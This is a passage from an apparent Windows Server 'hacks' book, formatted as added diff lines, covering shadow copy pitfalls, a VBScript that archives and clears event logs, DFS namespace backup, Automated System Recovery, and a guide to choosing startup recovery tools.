+Here's something else to consider that is often forgotten: NTFS
+permissions change differently, depending on whether you copy a
+file or move it. So, in the case of shadow copies, if you restore a
+previous version of a file, it overwrites the original file in its
+original location but maintains the same NTFS permissions as
+the original file. But if you copy a previous version of a file to a
+different location on your drive, the copy inherits the
+permissions of the folder you copy it to.
+
+Traps
+In addition to poor planning and scheduling, resulting in
+insufficient disk space, there are a few other things you need to
+watch out for when implementing shadow copies. The first thing
+has to do with the block-based mechanism by which the VSS
+makes copies of changes made to files. If the filesystem cluster
+size is smaller than this block size, some of your shadow copies
+might disappear when you defragment your volume using the
+built-in Disk Defragmenter node in Computer Management. To
+prevent this from happening, always ensure that volumes on
+which shadow copies are stored have cluster sizes of 16 KB or
+greater. By default, on Windows Server 2003, any volumes larger
+than 2 GB will have a cluster size of only 4 KB, which is
+insufficient.
+To solve this problem, when you format the volume, specify an
+allocation unit size of 16 KB instead using either Disk
+Management or the /a switch with the format command. On large
+volumes, you could use even higher cluster sizes of 32 or 64
+KB. But if the volume will be used to store many small files, this
+can result in much wasted space on your drive. So, 16 KB is
+probably the optimal solution in most cases.
+If you upgraded your server from Windows NT 4.0 Server and the
+volume was converted from FAT to NTFS by using the convert
+command, you're out of luck. Because convert always uses an
+allocation unit size of 512 bytes to optimally align with FAT
+filesystem boundaries, don't use a converted volume for storing
+shadow copies on a server. However, if your machine was
+previously running Windows 2000 Server, you might be in luck,
+because that platform allowed you to format FAT volumes with
+larger cluster sizes.
+
+Here are some other things to watch for:
+Don't enable shadow copies on a volume that has mount
+points on it. A mount point (or mounted drive) is a special
+volume that is attached to an empty folder on an NTFS
+volume. In other words, a mount point named Data could
+be attached to the folder E:\Stuff if volume E: is
+formatted using NTFS. In Windows Explorer, Data would
+appear just like any other volume, and mount points
+would therefore provide a way to get around the 26-
+letter limit for naming volumes using drive letters. The
+problem is that mount points are not included when
+shadowed copies are made for a volume, which means
+that files stored in these mounted drives will not have
+previous versions accessible to users. Also, if you share
+a mount point that's located on a volume that has
+shadow copies enabled, users won't be able to access
+previous versions of files in the folder attached to the
+mount point. So, it's best to avoid mount points entirely
+on shadowed volumes.
+Avoid using shadow copies on dual-boot configurations,
+where Windows Server 2003 and some earlier operating
+system such as Windows NT 4.0 Server are installed on
+the same machine. Corruption of shadow copies has
+been known to occur in such scenarios.
+Best practice is usually to enable shadow copies on any
+volume where data files are stored, because the
+enhanced Backup utility included with Windows Server
+2003 can back up open files on a volume on which
+shadow copies are enabled. That means that if users
+
+leave files open on their machines at night, the files can
+still be backed up instead of being locked and prevented
+from being backed up as in previous versions of Windows
+Backup. In this kind of scenario, it might be a good idea
+to schedule additional shadow copies to occur an hour or
+so before Backup is scheduled to run. You can also turn
+backing up of shadowed volumes on and off using the
+/SNAP switch in ntbackup, the command-line version of the
+Backup utility.
+Don't enable shadow copies on a system or boot volume,
+because there have been reports of excessive
+generation of shadow copies. This causes poor system
+performance, especially on domain controllers where the
+contents of Active Directory is frequently updated.
+Programs that create many temporary files on these
+volumes can also cause shadow copies to grow quickly
+and fill up your volume if you give them enough room to
+do so, and a system volume that fills up is one that blue-
+screens.
+If you accidentally delete any of the default hidden
+administrative shares on your server, you won't be able
+to enable shadow copies on any volumes on your
+machine. Fortunately, Microsoft has a workaround in
+such circumstances. Search the Knowledge Base on
+Microsoft Product Support Services (PSS) at
+http://support.microsoft.com for information on how to
+restore default administrative shares.
+Finally, before you delete a volume that has shadow
+copies enabled on it, disable shadow copies on the
+volume. If you don't, your event log might fill up with ID
+
+7001 error messages, which can be annoying.
+
+Hack 96 Back Up and Clear the Event
+Logs
+Here's a nifty script you can use to back up and clear the Event
+logs on your servers.
+Managing Event logs is an essential part of a system
+administrator's job. These logs are useful for a number of
+reasons, including troubleshooting system problems, verifying
+that services are functioning properly, and detecting possible
+intrusion attempts. While Event Viewer can be used to save and
+clear these logs, it can be handier to use a script you can run
+manually (by double-clicking on a desktop shortcut) or
+automatically at different times (by adding a task to the
+Scheduled Tasks folder).
+This hack provides a script to do just that. This VBScript will
+back up your Windows Event Logs and then clear the information
+contained within them.
+The Code
+Type the following script into Notepad (make sure to have Word
+Wrap disabled), and save it with a .vbs extension as
+archivelogs.vbs:
+Option Explicit
+
+On Error Resume Next
+Dim numThreshold
+Dim strMachine
+Dim strArchivePath
+Dim strMoniker
+Dim refWMI
+Dim colEventLogs
+Dim refEventLog
+If WScript.Arguments.Count < 2 Then
+WScript.Echo _
+"Usage: archivelogs.vbs [threshold]"
+WScript.Quit
+End If
+If WScript.Arguments.Count = 2 Then
+numThreshold = 0
+
+Else
+numThreshold = WScript.Arguments(2)
+If Not IsNumeric(numThreshold) Then
+WScript.Echo "The third parameter must be a number!"
+WScript.Quit
+End If
+If numThreshold < 0 OR numThreshold > 100 Then
+WScript.Echo "The third parameter must be in the range 0-100"
+WScript.Quit
+End If
+End If
+strMachine = WScript.Arguments(0)
+strArchivePath = WScript.Arguments(1)
+strMoniker = "winMgmts:{(Backup,Security)}!\\" & strMachine
+Set refWMI = GetObject(strMoniker)
+
+If Err <> 0 Then
+WScript.Echo "Could not connect to the WMI service."
+WScript.Quit
+End If
+Set colEventLogs = refWMI.InstancesOf("Win32_NTEventLogFile")
+If Err <> 0 Then
+WScript.Echo "Could not retrieve Event Log objects"
+WScript.Quit
+End If
+For Each refEventLog In colEventLogs
+'if shouldAct( ) returns non-zero attempt to back up
+If shouldAct(refEventLog.FileSize,refEventLog.MaxFileSize) <> 0 Then
+If refEventLog.ClearEventLog( _
+makeFileName(refEventLog.LogfileName)) = 0 Then
+WScript.Echo refEventLog.LogfileName & _
+
+" archived successfully"
+Else
+WScript.Echo refEventLog.LogfileName & _
+" could not be archived"
+End If
+Else
+WScript.Echo refEventLog.LogfileName & _
+" has not exceeded the backup level"
+End If
+Next
+Set refEventLog = Nothing
+Set colEventLogs = Nothing
+Set refWMI = Nothing
+Function shouldAct(numCurSize, numMaxSize)
+If (numCurSize/numMaxSize)*100 > numThreshold Then
+shouldAct = 1
+Else
+
+shouldAct = 0
+End If
+End Function
+Function makeFileName(strLogname)
+makeFileName = strArchivePath & "\" & _
+strMachine & "-" & strLogname & "-" & _
+Year(Now) & Month(Now) & Day(Now) & ".evt"
+End Function
+Running the Hack
+To run the script, use Cscript.exe, the command-line script
+engine of the Windows Script Host (WSH). The script uses the
+following command-line syntax:
+archivelogs.vbs machine archive_path [threshold]
+In this syntax, machine is the name of the server, archive_path is
+the path to where you want to save the backup, and threshold is
+an optional parameter that checks to see the size (in MB) of the
+logs.
+
+If the logs are above the threshold value
+you specify, the script will back them up.
+Otherwise, it will skip them.
+The following example shows how to run the script and provides
+typical output when the script is executed against a domain
+controller. The archive directory C:\Log Files must first be
+created on the machine on which you run the script.
+C:\>cscript.exe archivelogs.vbs srv210 "C:\Log Archive"
+Microsoft (R) Windows Script Host Version 5.6
+Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
+Security archived successfully
+System archived successfully
+Directory Service archived successfully
+DNS Server archived successfully
+File Replication Service archived successfully
+Application archived successfully
+
+C:\>
+The result of running the script is a set of files in C:\Log Files of
+the form srv210-Application-20031217.evt, srv210-Security-
+20031217.evt, and so on. Note that each archive file is named
+according to the server, event log, and current date.
+If you plan on using the Backup utility instead to back up the
+Event log files on your Windows 2000 servers, it might surprise
+you to know that being part of the Backup Operators group will
+not allow you to back up or restore these Event log files; this
+right is available to only local or domain administrators!
+Rod Trent
+
+Hack 97 Back Up the DFS Namespace
+If you've implemented the Distributed File System (DSF) on
+your network, you need to back up your DFS namespace
+regularly.
+The Distributed File System (DFS) is a feature of Windows 2000
+Server and Windows Server 2003 that lets you create a single
+logical tree of shared folders that are physically located on
+different file servers on your network. This makes it easier for
+administrators to manage shared folders, and it also helps users
+find shared resources, since the resources appear from the
+user's point of view as a single hierarchical set of folders on a
+single machine. As a result, to locate a particular shared folder
+on the network, users don't have to know the actual file server
+on which the folder resides; they just have to connect to the DFS
+tree and browse until they find the folder they require. Then, if
+the user has the appropriate permissions to access the folder, he
+can do whatever he needs to do with the files stored within it.
+A collection of shared resources arranged in a logical hierarchy
+like this is called a DFS namespace. This namespace begins with
+the DFS root, which forms the bottom of the DFS tree. The
+branches of the tree are called DFS links and they map to shared
+folders on different file servers across your network. Windows
+2000 Server machines can host only one DFS root (hence, only
+one namespace), but the Enterprise Edition of Windows Server
+2003 supports multiple DFS roots on a single machine.
+If you're using DFS, it's important that you back up your DFS
+
+configuration for your Windows 2000 domain. Unfortunately,
+many disaster-recovery products on the market that support
+Windows 2000 do not have a native add-in to support the
+backup and restoration of the DFS namespace.
+Fortunately, Microsoft has included in Windows 2000 two
+command-line-based tools (DFScmd and DFSUtil) to facilitate such
+a need. While the functionality in these tools is also provided in
+the GUI by the DFS snap-in for the MMC, using the command-
+line tools gives you the added flexibility of using them to create
+a script that you can execute via Task Scheduler to automate
+the backup process if your DFS topology changes often.
+DFScmd
+The first command-line utility, DFScmd, allows you to back up the
+DFS namespace to a text file that can be accessed later to
+restore the namespace if necessary. Here's the syntax to
+perform a backup:
+DFScmd /view \\DFSName\DFSShare /BATCH >> "path\filename.bat"
+For example, if you have a domain-based DFS namespace for the
+domain Consoto.net, with a DFS root named DFSRoot, then your
+backup syntax would look like this:
+DFScmd /view \\Consoto.net\DFSRoot /BATCH >> C:\Temp\dfsbackup.bat
+Here's an example of what is saved in this batch file:
+REM BATCH RESTORE SCRIPT
+REM dfscmd /map "\\consoto.net\DFSRoot" "\\servera.consoto.net\DFSRoot" "DFS Root for
+
+Consoto.Net members."
+dfscmd /map "\\consoto.net\DFSRoot\Departments\Finance" "\\serverb.consoto.net\finance$"
+"Finance Department."
+dfscmd /map "\\consoto.net\DFSRoot\Departments\ISS" "\\serverb.consoto.net\dept_iss$"
+"Information Systems Department."
+dfscmd /map "\\consoto.net\DFSRoot\Domain Support\IIS Published Sites"
+"\\serverc.consoto.net\inetpub$" "IIS Web Sites published for Internet/Intranet Access."
+The command completed successfully.
+To restore the DFS volume structure (namespace) from the
+server it was originally hosted on to a new file server in the
+domain, perform the following steps. Start Distributed File
+System from Administrative Tools and on the Action menu click
+New DFS Root. Click Next and then choose the proper type of
+DFS root for your domain. Select the server that will host the
+DFS root and then click Next. Select the share that will become
+the DFS Root Share and then click Next. Finally, insert a
+comment, click Next, and then click Finish. The new DFS root is
+now available.
+Now, run the batch file created earlier to restore the DFS volume
+structure. When the batch file has completed execution, verify
+that the namespace has been properly created. In our example,
+the DFS namespace should now appear in the Distributed File
+System Administrator like this:
+DFSRoot
+Departments
+
+Finance
+ISS
+Domain Support
+IIS Published Sites
+DFSUtil
+The second command-line utility, DFSUtil, allows you to query
+and perform troubleshooting of the DFS metadata with domain-
+based DFS implementations. DFS metadata is configuration
+information of DFS that is stored in the Active Directory-based
+Partition Knowledge Table. The functionality of the command-
+line-based DFSUtil parallels the functionality of the Distributed
+File System MMC snap-in.
+While DFScmd is a built-in operating system command, DFSUtil can
+be found on your Windows 2000/2003 product CD under the
+Support\Tools directory in the SUPPORT.CAB file. If you plan on
+using these utilities, I recommend you download the latest
+SUPPORT.CAB file from Microsoft's web site at
+http://www.microsoft.com/downloads/ if you are running Windows
+2000 Service Pack 2 or later. The service packs include
+updated versions of DFSUtil.exe that resolve issues encountered
+with the original version found on your Windows 2000 Server
+CD.
+Matt Goedtel
+
+Hack 98 Recover with Automated System
+Recovery
+Automated System Recovery (ASR) is a new feature of
+Windows Server 2003 that makes recovering from a disaster a
+whole lot easier.
+Rebuilding a server after a disaster is generally not a trivial
+task. The process usually involves reinstalling Windows from
+scratch, reconfiguring disk partitions to the exact configuration
+they had before the failure, and then restoring the system
+volumes, boot volumes, and all your data volumes. The process
+is not especially complicated, but it takes a considerable
+amount of time to do it right, usually with significant involvement
+of the administrator along the way.
+With Windows Server 2003, however, things have suddenly
+gotten much easier. Automated System Recovery (ASR), a new
+feature included in the Backup utility, greatly simplifies the
+process of recovering a server that won't boot because of severe
+problems with the system/boot volume, such as Registry
+corruption. By automating the process of restoring a failed
+server, ASR saves you time and reduces the chances for making
+mistakes. ASR is an essential part of the Recovery Roadmap
+[Hack #99] for troubleshooting problems that might happen to
+Windows servers, and this hack leads you through the process
+step by step. I'll also clarify how best to use this feature and
+how to resolve problems that can arise.
+
+ASR Backup
+The simplest way to back up your system with ASR is to use the
+Backup or Restore Wizard that starts by default when you select
+Accessories System Tools Backup. Simply start the
+wizard, select "Back up files and settings," and choose the
+option to back up "All information on this computer." Then,
+specify the remaining backup job parameters as usual. The
+result is that all information on your hard drives is backed up,
+including the boot, system, and data volumes. Later, should a
+disaster occur, you can restore your system by using the ASR
+restore process to the exact configuration it had earlier.
+The backup is done by using shadow copies [Hack #95] to
+ensure that any open files on the system and boot volumes are
+properly backed up. Note, however, that this applies mainly to
+the system and boot volumes, which are critical for successful
+ASR backup. While shadow copies are also used to back up data
+volumes, these shadow copies are deleted afterward unless
+you've specifically enabled shadow copies on these volumes to
+help protect users' work from accidental loss or damage.
+An alternative method for performing ASR backup is to start
+Backup and switch to Advanced Mode. Then, under the Welcome
+tab (Figure 10-9), select the Automated System Recovery
+Wizard button. This wizard lets you back up only information on
+your system and boot volumes that is critical to restore your
+system; it does not back up any data volumes, which are usually
+best left for your regular backup program to handle anyway.
+Figure 10-9. Starting the Automated System
+Recovery Wizard
+
+During the ASR backup process, you're asked to insert a blank,
+formatted floppy to create a system recovery disk (commonly
+called an ASR floppy). This floppy is critical to the ASR restore
+process, so it's worth digging a little deeper into how it's used.
+The ASR backup process saves two files onto your floppy: the
+ASR state file (asr.sif), which contains information about the
+disk signatures and configuration of disk volumes on your
+machine, and asrpnp.sif, which contains information about
+different Plug and Play devices on your system. These two files
+are critical for the recovery of your system, because they
+connect the underlying hardware configuration with the operating
+system above it. As we'll see in a moment, you need to insert
+
+this floppy at the beginning of the ASR restore, in order to
+rebuild the disk subsystem and hardware configuration of your
+system before restoring the contents of the system and boot
+volumes.
+What if you have no floppy disk drive on your machine?
+Fortunately, you can still use ASR to back up your system, but
+its a bit of a workaround. During the ASR backup process copies
+of these asr.sif and asrpnp.sif files are also saved in the
+%SystemRoot%\Repair folder on your server. So, when you
+receive a prompt at the end of the backup process to insert a
+floppy, simply ignore the prompt and instead copy asr.sif and
+asrpnp.sif from Repair to a network share on another server (one
+that has a floppy disk drive installed). Then, copy the files from
+the share on that server to a blank floppy you insert into its
+drive, and you now have a working ASR floppy for your backup.
+Then, go buy a USB external floppy drive, because you'll need it
+if you ever have to rebuild your original server from the backup
+set you created. In other words, you can perform ASR backup
+without a floppy, but you cannot perform an ASR restore without
+one.
+What if you lose your ASR floppy? Well, the procedure just
+described will work in this case too. Just insert a new blank,
+formatted floppy into your server and copy asr.sif and asrpnp.sif
+from the Repair directory to the floppy. Note that these files must
+be located in the root folder on the floppy for the restore process
+to work, so use a separate floppy for each ASR backup; don't try
+to combine several ASR backups in different folders on one
+floppy.
+However, since the Repair directory is located on the boot volume
+of the system itself, if your system volume is toast, then so is
+your Repair directory and the files within it. So, what if you've lost
+your ASR floppy and the Repair directory is gone with your hard
+drive? There's still a workaround that can save your bacon: use
+
+the Backup utility on a different machine to open the backup
+catalog for the ASR backup set you want to restore, expand the
+%SystemRoot%\Repair directory on the boot volume, select
+asr.sif and asrpnp.sif as the files you want to restore, insert a
+blank floppy, and restore these two files to the root of the floppy.
+Presto! You now have a recovered ASR floppy you can use to
+initiate a restore.
+ASR Restore
+The ASR restore process in a nutshell is as follows: first, the
+disk configurations are restored; then, your system and boot
+volumes are formatted; and, finally, a bare-bones version of
+Windows is installed that starts Backup and rebuilds your
+system and boot volumes from your ASR backup set stored on
+tape media.
+Note that your system and boot volumes are
+formatted. Clearly, using the ASR restore
+process should be considered a last-ditch
+effort, to be used only when everything
+else fails. See [Hack #99] for information
+on how to choose between the various
+recovery options for Windows servers.
+
+Using ASR restore
+Let's look at a restore in more detail. First, make sure you have
+your ASR floppy, tape backup media, and original installation
+files for Windows Server 2003 (i.e., the product CD). If you have
+any mass storage controllers on your server that require an
+updated driver to replace the one on the product CD, be sure to
+have this handy as well.
+Alsoand this might be importantbe sure to back up any data files
+or folders located on your system or boot volumes. Since ASR
+reformats these volumes, anything other than the Windows
+operating system files that are located on these volumes might
+be lost. Mind you, best practice is to never store data files on
+these volumesyou should store them on separate volumes
+insteadso if you've been following this practice you have nothing
+to worry about, right? Note that I said might be lost, not will be
+lost. While Windows documentation says that non-operating
+system files stored on system/boot volumes won't be restored
+by ASR, my own experience is that they are restored sometimes
+and other times not. So, just to be safe, back up these volumes
+separately using normal backup procedures so you can later
+restore any missing data files.
+Now, insert your product CD and boot from your CD-ROM drive
+(press the appropriate key to do this if required). Press F6 when
+prompted if you have an updated device driver for your mass
+storage device. Then, press F2 when text-mode setup prompts
+you to perform ASR restore, and insert the ASR floppy when
+asked to do so. The recovery process will rebuild the disk
+signatures and partition table, reformat the system/boot
+volumes, copy installation files, and begin installing Windows. A
+short while into the installation of Windows, the Automated
+System Recovery Wizard screen will ask you to specify the
+
+location of the tape backup media where your ASR backup is
+located. Once you specify this, the recovery process continues
+and it's considerably faster than the Windows installation
+process itself, which is nice. Be sure not to interrupt this
+process; otherwise, you'll have an incomplete and nonfunctional
+server. Once the restore process is finished, the logon screen
+appears and you're done.
+That is, you're done unless your system was totally fried and
+you have to rebuild it from scratchin which case, you have to
+complete the procedure by restoring any data volumes on your
+server from your regular backup sets.
+Here's one more thing that's helpful, but not documented.
+Running the ASR restore process also creates a setup.log file
+that identifies the system and boot volumes, checksums for
+kernel files, the directory where Windows is installed, and the
+device drivers loaded during setup. A copy of this file is placed
+in %SystemRoot%\Repair and also another one is placed on the
+ASR floppy itself, which is handy for verifying the details of the
+restore process. Print that log and keep a record of it for
+troubleshooting purposes later.
+Hacking the restore
+If your original machine is really toast, you can use ASR to
+restore to a different machine. However, to do this, you must
+ensure that the hardware on your new system is identical to your
+original (toasted) system, with the exception of the video card,
+network card, and hard disks, which can be different brands or
+types. Concerning hard disks, however, make sure the number of
+hard drives in your new system is equal to or greater than the
+
+number of hard drives on the old system, and also make sure
+that the storage capacity of each drive is the same or larger
+than drives on your old system.
+If you're using ASR to restore a failed server to another system
+with hardware that does differ significantly from the old one,
+there's a workaround: you can hack the asr.sif file to make the
+ASR restore process install additional device drivers (or any
+other kinds of files) that might be needed by the text-mode
+setup process to install Windows successfully and complete the
+recovery.
+The asr.sif file is a text file with different sections, identified by
+brackets:
+[VERSION]
+Signature="$Windows NT$"
+ASR-Version="1.0"
+[SYSTEMS]
+1="SRV230","x86","5.2","C:\WINDOWS",1,0x00020112,"360 0 -60 0-10-0-5 2:00:00.0 0-4-0-1
+2:00:00.0","Central Standard Time","Central Daylight Time"
+[BUSES]
+1=1,3
+
+[DISKS.MBR]
+1=1,1,1,0xdbe3dbe3,512,63,255,16514064
+By adding an additional [InstallFiles] section, you can specify
+additional files that need to be copied to the machine during
+text-mode setup. For example, adding the following section will
+cause the driver file MyDriver.sys to be copied from the root of
+the floppy disk that has the volume label My Drivers to the
+%SystemRoot%\System32\Drivers folder on the machine:
+[InstallFiles]
+1=1,"My Drivers","Floppy","%SystemRoot%\System32\Drivers\MyDriver.sys","My Company Name",
+0x00000001
+During text-mode setup, a prompt will ask you to insert the
+floppy disk that has the driver file for My Company Name, and the
+0x00000001 flag indicates that this prompt will always appear.
+Other flags can also be used, including 0x00000006, which
+indicates that ASR recovery can't proceed unless you load the
+specified driver file; 0x00000010, which indicates that any existing
+copy of MyDriver.sys should be overwritten by the new file; and
+0x00000020, which prompts before overwriting an existing version
+of the file.
+Using this hack, you can customize the ASR restore process to
+make it successful, even if there are some hardware differences
+between the original machine and the new one.
+Using ASR
+
+Finally, many administrators don't understood when to use ASR
+to back up the system and when they should just use regular
+backups. You should back up your system anytime you change
+your hardware or operating system configuration. Examples of
+such changes might include upgrading to a new version of the
+operating system, installing service packs or hotfixes, adding
+new disk storage or changing the partition layout of your
+volumes, switching from basic to dynamic storage, installing a
+new Windows component or service, installing and configuring a
+third-party application, installing new hardware or upgrading
+device drivers, and so on.
+Doesn't this sound suspiciously like the instructions for creating
+the old Emergency Repair Disk (ERD) on Windows NT/2000?
+Yes, though ASR is a far more powerful feature than the ERD.
+since it backs up the System State and Registry on your
+machine, it does include similar functionality to the ERD,
+including saving a copy of your Registry hives in the Repair
+folder. But while the ERD could be used only to replace corrupt or
+missing system files or Registry hives, ASR is a complete
+system-recovery feature that does everything the ERD did and
+moreautomatically.
+You don't need to use ASR for backup when your system is tuned
+and running perfectly and only user data files are being created,
+modified, or deleted on your server. If you've properly partitioned
+your system so that all user data files are on data volumes
+separate from the boot and system volumes, then you can
+simply back up these data volumes on a daily basis to ensure
+nothing is lost in the case of a disaster. But if you change your
+basic operating system or underlying hardware in an significant
+way, use Backup to create a new ASR backup set so that you
+can recover your system to its current state, should massive
+failure occur.
+
+Hack 99 Recovery Roadmap
+When it comes to troubleshooting startup problems, finding the
+right tool for the job is the key.
+Would you try to crack a walnut with a bulldozer? Or pry open a
+door with a toothpick? Every tool has its purpose, and using the
+right tool for the job gets the job done quick and easy. The same
+is true concerning the maze of troubleshooting options available
+for restoring Windows 2000 and Windows Server 2003 systems
+that fail on startup. Safe Mode, Last Known Good Configuration,
+Emergency Repair Disk, Recovery Console, Automated System
+Recovery, Windows Startup Diskwhich should you use and in
+which situations? This hack helps you get your toolbox in order
+by answering that question.
+Windows 2000
+I'll start with Windows 2000 and then highlight differences in
+troubleshooting issues on the newer Windows Server 2003
+platform. Obviously, we won't be able to cover every possible
+scenario or even the intricate details of specific situations, but if
+you follow the procedures outlined in this hack, you should be
+able to get started and figure the rest out yourself, with the help
+of various Knowledge Base articles on Microsoft Product Support
+Services (http://support.microsoft.com).
+
+To make things crystal clear, here's the big picture, right from
+the start:
+1. If the system won't boot, boot with the Last Known
+Good Configuration.
+If that fails or isn't an option, try booting into Safe Mode or
+one of its variants.
+If that fails or isn't an option, try using the Recovery
+Console together with a Windows Startup Disk to repair your
+machine.
+If that fails or isn't an option, try the Emergency Repair
+Process to repair your machine.
+If that fails, you'll probably have to completely rebuild your
+machine from tape backup media.
+There are exceptions to this procedure, based on possible
+knowledge you have of what might be wrong with your machine,
+and we'll talk about that later. But first, let's unpack these steps
+one at a time.
+Last Known Good Configuration
+When you press F8 during the startup process (or when you see
+the "Please select the operating system to start" message, if
+you have the Recovery Console installed), the Windows
+
+Advanced Options Menu is displayed. One of the options on this
+menu is Last Known Good Configuration, which uses the Registry
+settings that Windows used for its last successful logon. Every
+time you boot Windows and log on successfully, this information
+is updated in the Registry and becomes your next version of
+Last Known Good Configuration. This applies only to normal
+mode; logging on to Safe Mode successfully does not update
+your Last Known Good Configuration settings.
+Digging a little deeper, when you use Last Known Good
+Configuration, Windows restores the
+HKLM\SYSTEM\CurrentControlSet Registry settings from a previous
+set of settings, such as ControlSet001 or ControlSet002. In
+addition, Last Known Good Configuration also rolls back the
+device drivers used by your system to those that loaded during
+your last successful logon. However, Last Know Good
+Configuration cannot be used to restore missing or corrupt
+operating-system files.
+When should you use Last Known Good Configuration to recover
+your system? Choosing this option overwrites any Registry
+changes or device-driver configuration changes you made during
+your last successful logon session and restores your system to
+the previous logon session's configuration. In other words, you
+lose any configuration changes made and any updated drivers
+installed since the last successful logon to your system. As a
+result, you should use this tool only if you think that some
+configuration change you recently made or a device driver you
+updated might be causing your system to fail upon startup.
+Typically, a problem like this will cause a STOP error (blue screen)
+of some sort, and the message on the screen might give you a
+clue about which driver or service might be causing the failure.
+So, the moral of the story is, if you change something, reboot,
+and your system won't start, try Last Known Good Configuration
+to restore your system.
+
+Safe Mode
+If you think your problem isn't due to a recent misconfiguration
+error on your part and you haven't updated any device drivers
+lately, then try Safe Mode if your system won't start. Safe Mode
+lets you start your system using a minimal set of device drivers
+and services. This allows you to get to a logon screen and start
+using Windows to look for what might be wrong. Safe Mode can
+also be accessed by using the Advanced Options menu by
+pressing F8. There are three versions you can use: Safe Mode,
+Safe Mode with Networking, and Safe Mode with Command
+Prompt.
+I suggest you always try Safe Mode with Networking, because
+might may need to access your Windows installation files on a
+network distribution point to repair your serverfor example, by
+extracting driver files from a .cab file. If Safe Mode with
+Networking fails, try Safe Mode; if that works, then something
+might be wrong with your network card or networking subsystem
+settings. If that fails, try Safe Mode with Command Prompt so
+that you can at least get to the Windows command-line
+troubleshooting tools to look for what's wrong with your system.
+You can log on to Safe Mode by using either a domain
+administrator account or the local administrator account. On a
+domain controller, the local administrator account is the only
+local account present on the machine and is stored in a minimal
+version of the SAM database found on member servers and
+workstations. This is also the account used to run the Recovery
+Console, and it uses the password you specified when you first
+installed Windows (unless it's been changed).
+When should you use Safe Mode and its variants? Usually, you
+might try this if you recently installed new hardware or software
+
+on your machine, not necessarily during the most recent logon
+session. Once you're logged on in Safe Mode, you can start
+disabling hardware devices one at a time until you find exactly
+which device is causing the problem. Or, if the issue is software-
+related, you can try to reconfigure or even uninstall different
+applications to isolate the problem and then see if you can
+reboot in Normal Mode.
+Some of the Windows tools you might use in Safe Mode to try to
+determine the cause of startup failure include Event Viewer,
+System Information (Start Run msinfo32), Device
+Manager, and so on. Also, successfully booting into any version
+of Safe Mode creates a log file named Ntbtlog.txt (found in
+%SystemRoot%) that describes the services started and the
+drivers loaded during startup. By examining this list, you might
+be able to determine which failed service or missing/corrupt
+driver is preventing Windows from starting, and then you can use
+the GUI tools to fix your problem.
+Recovery Console
+The Recovery Console is a command-line interface that you can
+start either by selecting it from the Boot Loader menu (if you've
+previously installed the Recovery Console on your server) or
+directly from the product CD. You must log onto the Recovery
+Console using the local administrator account on your machine,
+even if it's a domain controller. Recovery Console provides you
+with a minimal version of Windows that lets you run various
+commands to perform tasks such as copying and replacing
+system files, enabling or disabling problem services, repairing a
+boot sector, or even reformatting your drive.
+
+Best practice is to install the Recovery Console on your
+machine before you need it. That way, you won't be running
+around looking for your product CD when a disaster occurs and
+you can't start your system. To install the Recovery Console on
+a machine, insert the product CD, open a command prompt,
+change to the I386 folder on the CD, and type winnt32 /cmdcons.
+If you haven't installed the Console and need to run it directly
+from the CD, insert the CD and select the Repair option.
+Windows Startup Disk
+Sometimes, Windows won't boot because the boot sector is
+damaged on your system volume or a virus has infected your
+master boot record. A Windows Startup Disk can be extremely
+handy in such circumstances. The name of the disk is a bit of a
+misnomer, because you can't start Windows from the disk itself.
+Rather, the disk can be used in conjunction with the Recovery
+Console to repair certain kinds of problems that might arise.
+But first, here's how to create one of these disks so that you'll
+have it ready when you need it. Stick a blank floppy disk into
+your machine and double-click on My Computer. Right-click on
+your A: drive and select Format. Check the option for Quick
+Format and click Start to format your disk. Now, double-click on
+the C: drive to open it in My Computer, select Tools Folder
+Options, and on the View tab clear the checkbox labeled "Hide
+protected operating system files." Drag and drop the boot.ini,
+ntldr, and ntdetect.com files from the root of the C: drive to your
+floppy, and include the Bootsect.dos and Ntbootdd.sys files if
+these are also present. Open a command prompt window and
+type attrib -h -s -r a:\*.* to set the attributes properly for the
+files on your floppy. Eject the floppy and label it Windows Startup
+
+Disk or something similar. Finally, hide your protected system
+files again in My Computer so that you don't accidentally try to
+delete any of them.
+Now, if your system won't start because of a damaged master
+boot record, a corrupt boot sector, or missing or corrupt system
+files such as Ntldr or Ntdetect.com, you can start the system by
+using the Recovery Console (from the product CD if necessary),
+insert your Windows Startup Disk, and copy the files you need
+from the floppy to your C: drive. Then, you can run other
+Recovery Console commands to repair the boot sector (using
+the fixboot command), repair the master boot record (using the
+fixmbr command), and so on, until you have a working system
+that will start.
+Emergency Repair Process
+The only other thing you can usually try (short of reinstalling
+Windows from scratch) is the Emergency Repair Process. This
+feature of Windows 2000 is basically a holdover from Windows
+NT. The Emergency Repair Disk (ERD) itself isn't as useful
+(since a floppy can't contain the whole Windows 2000 Registry)
+as the other actions that are performed by Windows when you
+create this disk. In particular, when you create an ERD by
+starting the Backup utility and selecting Tools Create an
+Emergency Repair Disk, be sure to select the "Also backup the
+Registry to the repair directory" option, which backs up all your
+Registry hives to the %SystemRoot%\ Repair folder. Then, when
+you need to repair the Registry or replace missing or damaged
+files on your machine, you can press L when the startup process
+asks you for your ERD floppy. Doing so will ignore the floppy and
+use the information in the Repair directory instead. Of course, if
+
+your boot volume is badly damaged, your Repair folder might be
+corrupt or missing, in which case you will likely have to reinstall
+Windows from scratch anyway.
+The repair process finds the boot.ini file, reads the ARC paths to
+the operating system, and then attempts to load the
+%systemroot%\System32\Config\Software Registry hive. If the
+boot.ini file is corrupt or missing or if the Software hive is
+corrupt, the repair fails (unless you actually do have an ERD
+handy, in which case the repair process can gain access to a
+working copy of the Setup.log file for your machine). Hopefully,
+you updated your EFD the last time you reconfigured your
+machine or installed new hardware on it to keep it current.
+Windows Server 2003
+Things are pretty much the same in Windows Server 2003,
+except for one major difference: the ERD of Windows 2000 has
+been replaced by the new Automated System Recovery (ASR)
+feature of Windows Server 2003 [Hack #98]. This new ASR
+feature is a powerful tool of last resort for restoring your system
+when everything else fails. ASR includes the functionality of ERD
+and much, much more and can really save your bacon in an
+emergency when your server won't start and everything else
+(Last Known Good Configuration, Safe Mode, Recovery Console)
+fails.
+Right Tool for the Job
+Finally, here's a list of the proper tools to use when any of these
+common issues prevent your system from starting:
+
+A configuration change made during the last logon session
+Try Last Known Good Configuration and reconfigure
+accordingly.
+A device driver updated during the last logon session
+Try Last Known Good Configuration and try a different
+driver.
+Server misconfiguration
+Try Safe Mode and reconfigure accordingly.
+A newly installed device
+Try Safe Mode and disable, reconfigure, or uninstall the
+device.
+A newly installed application
+Try Safe Mode and uninstall the application.
+A newly installed hotfix or service pack
+Try Safe Mode and uninstall the hotfix or service pack.
+
+A problem service that prevents Windows from starting
+Try using the Recovery Console to reconfigure or disable
+the service.
